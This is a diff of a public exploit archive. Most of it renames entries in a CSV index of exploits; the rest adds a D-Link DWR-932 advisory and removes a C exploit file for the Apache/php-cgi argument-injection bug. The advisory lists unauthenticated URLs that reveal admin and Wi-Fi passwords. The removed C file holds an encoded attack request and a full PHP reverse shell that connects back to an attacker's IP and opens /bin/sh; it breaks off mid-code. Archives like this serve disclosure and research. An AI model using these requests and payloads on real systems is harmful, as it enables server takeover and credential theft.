21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0
21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0
21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0
21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,dos,0
21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0
@ -18628,7 +18628,7 @@ id,file,description,date,author,platform,type,port
21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0
21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0
21348,platforms/linux/local/21348.txt,"Webmin 0.x - Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0
21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0
21349,platforms/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0
21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability",2002-03-21,SPAX,windows,remote,0
21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability",2002-03-22,c3rb3r,windows,local,0
21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 Form Manipulation Vulnerability",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0
@ -20517,7 +20517,7 @@ id,file,description,date,author,platform,type,port
23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0
23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0
23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0
23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0
23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0
23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability",2003-10-30,ProXy,php,webapps,0
23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability",2003-10-24,Mindwarper,multiple,remote,0
@ -21825,7 +21825,7 @@ id,file,description,date,author,platform,type,port
24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x news.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0
24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x contents.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0
24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0
24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0
24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0
24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability",2004-10-06,anonymous,asp,webapps,0
24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0
24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service Vulnerability",2004-10-07,"Luigi Auriemma",multiple,dos,0
@ -22781,7 +22781,7 @@ id,file,description,date,author,platform,type,port
25632,platforms/cgi/webapps/25632.txt,"Easy Message Board Directory Traversal Vulnerability",2005-05-09,"SoulBlack Group",cgi,webapps,0
25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x Smiley Icon Location Remote Denial of Service Vulnerability",2005-05-09,fjlj@wvi.com,windows,dos,0
25634,platforms/cgi/webapps/25634.txt,"Easy Message Board Remote Command Execution Vulnerability",2005-05-09,"SoulBlack Group",cgi,webapps,0
25635,platforms/php/webapps/25635.txt,"PHP Nuke 0-7 Double Hex Encoded Input Validation Vulnerability",2005-05-09,fistfuxxer@gmx.de,php,webapps,0
25635,platforms/php/webapps/25635.txt,"PHP-Nuke 0-7 - Double Hex Encoded Input Validation Vulnerability",2005-05-09,fistfuxxer@gmx.de,php,webapps,0
25636,platforms/windows/local/25636.txt,"Positive Software H-Sphere Winbox 2.4 Sensitive Logfile Content Disclosure Vulnerability",2005-05-09,"Morning Wood",windows,local,0
25637,platforms/php/webapps/25637.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter XSS",2005-05-09,Lostmon,php,webapps,0
25638,platforms/php/webapps/25638.txt,"CodeThatShoppingCart 1.3.1 catalog.php id Parameter SQL Injection",2005-05-09,Lostmon,php,webapps,0
@ -24619,7 +24619,7 @@ id,file,description,date,author,platform,type,port
27505,platforms/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 ViewCal.html item_type_id Parameter XSS",2006-03-28,r0t,php,webapps,0
27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 ViewWeek.html week Parameter XSS",2006-03-28,r0t,php,webapps,0
27507,platforms/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps,0
27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x Html_Entity_Decode() Information Disclosure Vulnerability",2006-03-29,Samuel,php,remote,0
27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability",2006-03-29,Samuel,php,remote,0
27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk Index.PHP SQL Injection Vulnerability",2006-03-28,Preddy,php,webapps,0
27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0
27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0
@ -25468,7 +25468,7 @@ id,file,description,date,author,platform,type,port
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Include Vulnerabilities",2006-08-18,Crackers_Child,php,webapps,0
28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Local Privilege Escalation Vulnerability",2006-08-18,Netragard,linux,local,0
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection Vulnerability",2006-08-19,"Chris Boulton",php,webapps,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0
28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution",2013-09-20,xistence,php,remote,0
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability",2006-08-21,O.U.T.L.A.W,php,webapps,0
@ -26305,7 +26305,7 @@ id,file,description,date,author,platform,type,port
29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing Vulnerability",2006-12-15,"Matousec Transparent security",windows,dos,0
29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0
29290,platforms/linux/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,linux,remote,80
29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80
29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0
29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0
29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability",2006-12-18,shinnai,windows,dos,0
@ -26329,7 +26329,7 @@ id,file,description,date,author,platform,type,port
29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0
29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0
29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0
29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 / < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0
29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0
@ -27124,7 +27124,7 @@ id,file,description,date,author,platform,type,port
30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 Parser_Path Remote File Include Vulnerability",2007-05-22,the_Edit0r,php,webapps,0
30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0
30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 ShowOwn.PHP Cross-Site Scripting Vulnerability",2007-05-22,CorryL,php,webapps,0
30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0
30074,platforms/linux/remote/30074.txt,"PHP PEAR <= 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite Vulnerability",2007-05-07,"Gregory Beaver",linux,remote,0
30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 SQLEDIT.PHP Cross-Site Scripting Vulnerability",2007-05-23,"Michal Majchrowicz",php,webapps,0
30076,platforms/php/webapps/30076.txt,"WYYS 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-05-23,vagrant,php,webapps,0
30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting Vulnerability",2007-05-23,"Marc Ruef",asp,webapps,0
@ -31340,7 +31340,7 @@ id,file,description,date,author,platform,type,port
34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0
34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0
34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross-Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0
@ -31443,7 +31443,7 @@ id,file,description,date,author,platform,type,port
34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE (Metasploit) Shellshock Exploit",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@ -33790,7 +33790,7 @@ id,file,description,date,author,platform,type,port
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
37427,platforms/linux/shellcode/37427.txt,"encoded 64 bit execve shellcode",2015-06-29,"Bill Borskey",linux,shellcode,0
37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module)",2015-06-29,"Ben Lincoln",cgi,remote,0
37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0
37430,platforms/php/webapps/37430.txt,"CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0
37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure Vulnerability",2012-06-19,"Sammy FORGIT",php,webapps,0
@ -35806,3 +35806,17 @@ id,file,description,date,author,platform,type,port
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80
39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80
39582,platforms/php/webapps/39582.txt,"Xoops 2.5.7.2 - Arbitrary User Deletions CSRF",2016-03-21,hyp3rlinx,php,webapps,80
39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80
39584,platforms/php/webapps/39584.txt,"WordPress Image Export Plugin 1.1.0 - Arbitrary File Disclosure",2016-03-21,AMAR^SHG,php,webapps,80
39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share SEH Overflow RCE Exploit",2016-03-21,"Paul Purcell",windows,remote,80
39586,platforms/php/webapps/39586.txt,"Dating Pro Genie 2015.7 - CSRF Vulnerabilities",2016-03-21,"High-Tech Bridge SA",php,webapps,80
39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - CSRF Vulnerability",2016-03-21,"High-Tech Bridge SA",php,webapps,80
39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple XSS Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,36 @@
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: D-Link DWR-932
Tested Version: Firmware V4.00(EU)b03
Vendor: D-Link http://www.dlink.com/
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
Date: 20 Mar 2016
About Product:
---------------
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
Vulnerability Details:
----------------------
The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.
so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.
View Admin Username and Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
Output:
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
View Wifi Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
Output:
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
Export All Configurations:
http://192.168.0.1/cgi-bin/export_cfg.cgi
#EOF

View file

@ -1,457 +0,0 @@
/* Apache Magica by Kingcope */
/* gcc apache-magika.c -o apache-magika -lssl */
/* This is a code execution bug in the combination of Apache and PHP.
On Debian and Ubuntu the vulnerability is present in the default install
of the php5-cgi package. When the php5-cgi package is installed on Debian and
Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
the binary because this binary has a security check enabled when installed with
Apache http server and this security check is circumvented by the exploit.
When accessing the php-cgi binary the security check will block the request and
will not execute the binary.
In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
check is done when the php.ini configuration setting cgi.force_redirect is set
and the php.ini configuration setting cgi.redirect_status_env is set to no.
This makes it possible to execute the binary bypassing the Security check by
setting these two php.ini settings.
Prior to this code for the Security check getopt is called and it is possible
to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
-d switch. If both values are set to zero and the request is sent to the server
php-cgi gets fully executed and we can use the payload in the POST data field
to execute arbitrary php and therefore we can execute programs on the system.
apache-magika.c is an exploit that does exactly the prior described. It does
support SSL.
/* Affected and tested versions
PHP 5.3.10
PHP 5.3.8-1
PHP 5.3.6-13
PHP 5.3.3
PHP 5.2.17
PHP 5.2.11
PHP 5.2.6-3
PHP 5.2.6+lenny16 with Suhosin-Patch
Affected versions
PHP prior to 5.3.12
PHP prior to 5.4.2
Unaffected versions
PHP 4 - getopt parser unexploitable
PHP 5.3.12 and up
PHP 5.4.2 and up
Unaffected versions are patched by CVE-2012-1823.
*/
/* .
/'\rrq rk
. // \\ .
.x.//fco\\-|-
'//cmtco\\zt
//6meqrg.\\tq
//_________\\'
EJPGQO
apache-magica.c by Kingcope
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <stddef.h>
#include <openssl/rand.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
typedef struct {
int sockfd;
SSL *handle;
SSL_CTX *ctx;
} connection;
void usage(char *argv[])
{
printf("usage: %s <--target target> <--port port> <--protocol http|https> " \
"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n",
argv[0]);
exit(1);
}
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
"Content-Type: application/x-www-form-urlencoded\r\n" \
"Content-Length: %d\r\n" \
"Connection: close\r\n\r\n%s";
char phpstr[] = "<?php\n" \
"set_time_limit(0);\n" \
"$ip = '%s';\n" \
"$port = %d;\n" \
"$chunk_size = 1400;\n" \
"$write_a = null;\n" \
"$error_a = null;\n" \
"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n" \
"$daemon = 0;\n" \
"$debug = 0;\n" \
"if (function_exists('pcntl_fork')) {\n" \
" $pid = pcntl_fork(); \n" \
" if ($pid == -1) {\n" \
" printit(\"ERROR: Can't fork\");\n" \
" exit(1);\n" \
" }\n" \
" if ($pid) {\n" \
" exit(0);\n" \
" }\n" \
" if (posix_setsid() == -1) {\n" \
" printit(\"Error: Can't setsid()\");\n" \
" exit(1);\n" \
" }\n" \
" $daemon = 1;\n" \
"} else {\n" \
" printit(\"WARNING: Failed to daemonise.\");\n" \
"}\n" \
"chdir(\"/\");\n" \
"umask(0);\n" \
"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n" \
"if (!$sock) {\n" \
" printit(\"$errstr ($errno)\");\n" \
" exit(1);\n" \
"}\n" \
"$descriptorspec = array(\n" \
" 0 => array(\"pipe\", \"r\"),\n" \
" 1 => array(\"pipe\", \"w\"),\n" \
" 2 => array(\"pipe\", \"w\")\n" \
");\n" \
"$process = proc_open($shell, $descriptorspec, $pipes);\n" \
"if (!is_resource($process)) {\n" \
" printit(\"ERROR: Can't spawn shell\");\n" \
" exit(1);\n" \
"}\n" \
"stream_set_blocking($pipes[0], 0);\n" \
"stream_set_blocking($pipes[1], 0);\n" \
"stream_set_blocking($pipes[2], 0);\n" \
"stream_set_blocking($sock, 0);\n" \
"while (1) {\n" \
" if (feof($sock)) {\n" \
" printit(\"ERROR: Shell connection terminated\");\n" \
" break;\n" \
" }\n" \
" if (feof($pipes[1])) {\n" \
" printit(\"ERROR: Shell process terminated\");\n" \
" break;\n" \
" }\n" \
" $read_a = array($sock, $pipes[1], $pipes[2]);\n" \
" $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \
" if (in_array($sock, $read_a)) {\n" \
" if ($debug) printit(\"SOCK READ\");\n" \
" $input = fread($sock, $chunk_size);\n" \
" if ($debug) printit(\"SOCK: $input\");\n" \
" fwrite($pipes[0], $input);\n" \
" }\n" \
" if (in_array($pipes[1], $read_a)) {\n" \
" if ($debug) printit(\"STDOUT READ\");\n" \
" $input = fread($pipes[1], $chunk_size);\n" \
" if ($debug) printit(\"STDOUT: $input\");\n" \
" fwrite($sock, $input);\n" \
" }\n" \
" if (in_array($pipes[2], $read_a)) {\n" \
" if ($debug) printit(\"STDERR READ\");\n" \
" $input = fread($pipes[2], $chunk_size);\n" \
" if ($debug) printit(\"STDERR: $input\");\n" \
" fwrite($sock, $input);\n" \
" }\n" \
"}\n" \
"\n" \
"fclose($sock);\n" \
"fclose($pipes[0]);\n" \
"fclose($pipes[1]);\n" \
"fclose($pipes[2]);\n" \
"proc_close($process);\n" \
"function printit ($string) {\n" \
" if (!$daemon) {\n" \
" print \"$string\n\";\n" \
" }\n" \
"}\n" \
"exit(1);\n" \
"?>";
struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)
{
struct hostent *he;
struct sockaddr_in server, *servercopy;
if ((he=gethostbyname(hostname)) == NULL) {
printf("Hostname cannot be resolved\n");
exit(255);
}
servercopy = malloc(sizeof(struct sockaddr_in));
if (!servercopy) {
printf("malloc error (1)\n");
exit(255);
}
memset(&server, '\0', sizeof(struct sockaddr_in));
memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);
server.sin_family = AF_INET;
server.sin_port = htons(port);
memcpy(servercopy, &server, sizeof(struct sockaddr_in));
return servercopy;
}
char *sslread(connection *c)
{
char *rc = NULL;
int received, count = 0, count2=0;
char ch;
for(;;)
{
if (!rc)
rc = calloc(1024, sizeof (char) + 1);
else
if (count2 % 1024 == 0) {
rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
}
received = SSL_read(c->handle, &ch, 1);
if (received == 1) {
rc[count++] = ch;
count2++;
if (count2 > 1024*5)
break;
}
else
break;
}
return rc;
}
char *read_(int sockfd)
{
char *rc = NULL;
int received, count = 0, count2=0;
char ch;
for(;;)
{
if (!rc)
rc = calloc(1024, sizeof (char) + 1);
else
if (count2 % 1024 == 0) {
rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
}
